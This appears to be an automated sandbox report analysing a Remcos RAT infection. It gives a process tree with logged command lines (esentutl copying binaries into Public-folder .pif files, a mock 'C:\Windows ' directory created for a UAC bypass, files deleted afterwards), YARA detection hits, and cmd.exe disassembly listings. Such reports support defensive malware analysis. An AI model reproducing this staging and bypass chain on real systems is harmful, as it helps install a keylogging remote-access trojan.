Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:20:09
Start date:	30/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Imagebase:	0xa60000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:20:10
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.pif
Wow64 process (32bit):	true
Commandline:	C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Imagebase:	0x850000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:20:10
Start date:	30/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /o
Imagebase:	0xa60000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:20:10
Start date:	30/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:20:10
Start date:	30/11/2024
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\colorcpl.exe
Imagebase:	0x290000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	15:20:10
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.pif
Wow64 process (32bit):	true
Commandline:	C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Imagebase:	0x850000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:20:12
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.pif
Wow64 process (32bit):	true
Commandline:	C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Imagebase:	0x850000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:20:12
Start date:	30/11/2024
Path:	C:\Users\Public\xpha.pif
Wow64 process (32bit):	true
Commandline:	C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Imagebase:	0xc20000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:20:22
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.pif
Wow64 process (32bit):	true
Commandline:	C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Imagebase:	0x850000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:20:23
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.pif
Wow64 process (32bit):	true
Commandline:	C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Imagebase:	0x850000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	15:20:23
Start date:	30/11/2024
Path:	C:\Users\Public\Libraries\Puyiaiob.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Puyiaiob.PIF"
Imagebase:	0x400000
File size:	1'058'816 bytes
MD5 hash:	35811E8D8969BEF5354C7C3E6DBEFB27
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 24%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:20:23
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.pif
Wow64 process (32bit):	true
Commandline:	C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Imagebase:	0x850000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	15:20:23
Start date:	30/11/2024
Path:	C:\Windows\SysWOW64\SndVol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\SndVol.exe
Imagebase:	0x9b0000
File size:	226'712 bytes
MD5 hash:	BD4A1CC3429ED1251E5185A72501839B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	15:20:31
Start date:	30/11/2024
Path:	C:\Users\Public\Libraries\Puyiaiob.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Puyiaiob.PIF"
Imagebase:	0x400000
File size:	1'058'816 bytes
MD5 hash:	35811E8D8969BEF5354C7C3E6DBEFB27
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	15:20:31
Start date:	30/11/2024
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\colorcpl.exe
Imagebase:	0x290000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	36.9%
Total number of Nodes:	664
Total number of Limit Nodes:	27

Executed Functions

Function 00007FF7823E0A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3

_wcsnicmp.MSVCRT ref: 00007FF7823E0AFE
memset.MSVCRT ref: 00007FF7823E0B37
wcschr.MSVCRT ref: 00007FF7823E0B91
wcsrchr.MSVCRT ref: 00007FF7823E0C14
wcsrchr.MSVCRT ref: 00007FF7823E0D79
NeedCurrentDirectoryForExePathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0 ref: 00007FF7823E0D9A
wcsrchr.MSVCRT ref: 00007FF7823E0FBB
wcschr.MSVCRT ref: 00007FF7823E0FD8
wcschr.MSVCRT ref: 00007FF7823E0FF3
_wcsicmp.MSVCRT ref: 00007FF7823E1091
_wcsicmp.MSVCRT ref: 00007FF7823E10B1
wcsrchr.MSVCRT ref: 00007FF7823E1102
_wcsicmp.MSVCRT ref: 00007FF7823E1124
_wcsicmp.MSVCRT ref: 00007FF7823E1142
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E1169

Strings

.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 00007FF7823EDA38
COMSPEC, xrefs: 00007FF7823ED927
.CMD, xrefs: 00007FF7823E10A7, 00007FF7823E111A
.BAT, xrefs: 00007FF7823E1087, 00007FF7823E1138
cmd , xrefs: 00007FF7823E0AF4
PATHEXT, xrefs: 00007FF7823E0E6E
PATH, xrefs: 00007FF7823E11D3

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
API String ID: 3305344409-4288247545
Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
Instruction ID: f1fc7b43091ccaca5fd533c30268ff22d908fca2381e32a1fa5fffd121b7dbd5
Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
Instruction Fuzzy Hash: 55421A25A0868295EB50BB11D8202B9E7A0FF85B96FE44178DD5E57FD4DFBCE848C320

Function 00007FF7823DAA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD

wcschr.MSVCRT ref: 00007FF7823DAAB6
towlower.MSVCRT ref: 00007FF7823DAAD5
memset.MSVCRT ref: 00007FF7823DAC27
wcschr.MSVCRT ref: 00007FF7823DAC3C
wcschr.MSVCRT ref: 00007FF7823DAC60
wcsrchr.MSVCRT ref: 00007FF7823DAC9B
wcschr.MSVCRT ref: 00007FF7823DAD82
wcschr.MSVCRT ref: 00007FF7823DAD9D
wcschr.MSVCRT ref: 00007FF7823DADB8
wcschr.MSVCRT ref: 00007FF7823DADD3
wcschr.MSVCRT ref: 00007FF7823DADEE
wcschr.MSVCRT ref: 00007FF7823DAE09
iswspace.MSVCRT ref: 00007FF7823DAE30

Strings

OFF, xrefs: 00007FF7823EBC32, 00007FF7823EBC92, 00007FF7823EBD0A
:ON, xrefs: 00007FF7823EBD37
:, xrefs: 00007FF7823EBC26
:, xrefs: 00007FF7823EBCFE
:, xrefs: 00007FF7823EBC86

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
String ID: :$:$:$:ON$OFF
API String ID: 972821348-467788257
Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
Instruction ID: 4a7e53762f0a869fec2d6f8f4a0b61da8195ee142f5ac8839a682d2addbe7c28
Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
Instruction Fuzzy Hash: DD22C565A0864395EB65BF21D524278EA91FF48B83FE88079C90E47F94DFBCA844C370

Function 00007FF7823E51EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7823E5508: GetUserDefaultLCID.KERNELBASE(?,?,?,?,00007FF7823D6F97), ref: 00007FF7823E550C

GetLocaleInfoW.KERNELBASE ref: 00007FF7823E5237
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5260
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E52AB
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E52F7
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5335
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5360
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5388
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E53B0
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E53D8
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5400
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5428
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5450
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E5478
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E54A0
setlocale.MSVCRT ref: 00007FF7823E54BD

Strings

Mon, xrefs: 00007FF7823EEFF2
yy/MM/dd, xrefs: 00007FF7823EEF8D
MM/dd/yy, xrefs: 00007FF7823E52D0
Thu, xrefs: 00007FF7823EF0BB
Sat, xrefs: 00007FF7823EF141
Fri, xrefs: 00007FF7823EF0FE
Sun, xrefs: 00007FF7823EF184
.OCP, xrefs: 00007FF7823E54B4
dd/MM/yy, xrefs: 00007FF7823EEFA3
Tue, xrefs: 00007FF7823EF035
Wed, xrefs: 00007FF7823EF078

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: InfoLocale$DefaultUsersetlocale
String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
API String ID: 1351325837-2236139042
Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
Instruction ID: 1b4550147cb6ddf8cda9f0308d50090654fb4eeac9d8d6c3e1876942f8997a16
Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
Instruction Fuzzy Hash: 91F18069B0474295EF51AF11D5202B9B6A4FF08B82FE44179CA0D53B94EFBCE94AC330

Function 00007FF7823E4224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328
threadprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4297
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E42D7
memset.MSVCRT ref: 00007FF7823E42FD
memset.MSVCRT ref: 00007FF7823E4368
GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4380

Part of subcall function 00007FF7823E3A90: wcsrchr.MSVCRT ref: 00007FF7823E3ADF
Part of subcall function 00007FF7823E3A90: _wcsnicmp.MSVCRT ref: 00007FF7823E3B38

wcsrchr.MSVCRT ref: 00007FF7823E43E6
lstrcmpW.KERNELBASE ref: 00007FF7823E4401
CreateProcessW.KERNELBASE ref: 00007FF7823E447F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823E44AA
CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E45EE
_local_unwind.MSVCRT ref: 00007FF7823E4644
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823E47E1
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4802
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823EECD4
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823EECF0
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823EED12

Strings

\XCOPY.EXE, xrefs: 00007FF7823E43F7
=ExitCodeAscii, xrefs: 00007FF7823E456B
h, xrefs: 00007FF7823E436D
%01C, xrefs: 00007FF7823E47B1
%08X, xrefs: 00007FF7823E452C
COPYCMD, xrefs: 00007FF7823E439C, 00007FF7823E44B9
=ExitCode, xrefs: 00007FF7823E454C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
API String ID: 388421343-2905461000
Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
Instruction ID: 45153a5da332e9f13f90a9b4cc20274975fdf5eafc6591f100395bdc5d5849e0
Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
Instruction Fuzzy Hash: E9F14235A18B8295E760AB11E4507BAF7A4FF89742FA04179DA4D43F54DFBCE448CB20

Function 00007FF7823E5554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7823E4E35), ref: 00007FF7823E55DA
RegQueryValueExW.KERNELBASE ref: 00007FF7823E5623
RegQueryValueExW.KERNELBASE ref: 00007FF7823E5667
RegQueryValueExW.KERNELBASE ref: 00007FF7823E56BE
RegQueryValueExW.KERNELBASE ref: 00007FF7823E5702
RegQueryValueExW.KERNELBASE ref: 00007FF7823E5759
RegQueryValueExW.KERNELBASE ref: 00007FF7823E57CF
RegQueryValueExW.KERNELBASE ref: 00007FF7823E5862
RegCloseKey.KERNELBASE ref: 00007FF7823E587B
time.MSVCRT(?,00000000,?,00000001,?,00007FF7823E4E35), ref: 00007FF7823E5896
srand.MSVCRT ref: 00007FF7823E58A5

Strings

EnableExtensions, xrefs: 00007FF7823E5660
PathCompletionChar, xrefs: 00007FF7823E57C8
DefaultColor, xrefs: 00007FF7823E56FB
AutoRun, xrefs: 00007FF7823E585B
DisableUNCCheck, xrefs: 00007FF7823E5614
Software\Microsoft\Command Processor, xrefs: 00007FF7823E55D3
DelayedExpansion, xrefs: 00007FF7823E56B7
CompletionChar, xrefs: 00007FF7823E5752

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: QueryValue$CloseOpensrandtime
String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
API String ID: 145004033-3846321370
Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
Instruction ID: cfb1b55e255c250bba52f146bca12e34ef3502b926dfafb88d1960a82abc946b
Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
Instruction Fuzzy Hash: 00E1947651DA82D6E790AB10E45057AF7A0FB88742FE05135EA8E43E54DFFCD948CB20

Function 00007FF7823E4D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4D9A

Part of subcall function 00007FF7823E58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7823FC6DB), ref: 00007FF7823E58EF

